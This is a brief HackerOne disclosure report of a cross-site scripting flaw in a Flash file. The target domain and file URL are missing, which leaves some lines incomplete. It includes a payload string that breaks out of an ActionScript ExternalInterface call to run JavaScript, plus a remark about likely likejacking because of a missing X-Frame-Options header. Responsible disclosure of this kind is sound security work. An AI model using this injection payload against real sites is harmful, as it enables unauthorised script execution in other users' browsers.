Flash XSS on

ID H1:58831
Type hackerone
Reporter tunnelshade
Modified 2015-10-30T12:22:06


Vulnerable Flash File:

Steps:
+ Open\%22));alert(document.domain);}catch(e){}//
+ Click on social share and click on anything (e.g. Twitter)

Severity:
+ XSS on
+ There is an ActionScript function bound to JavaScript using ExternalInterface. So, I suspect that likejacking is possible since doesn't send X-FRAME-OPTIONS.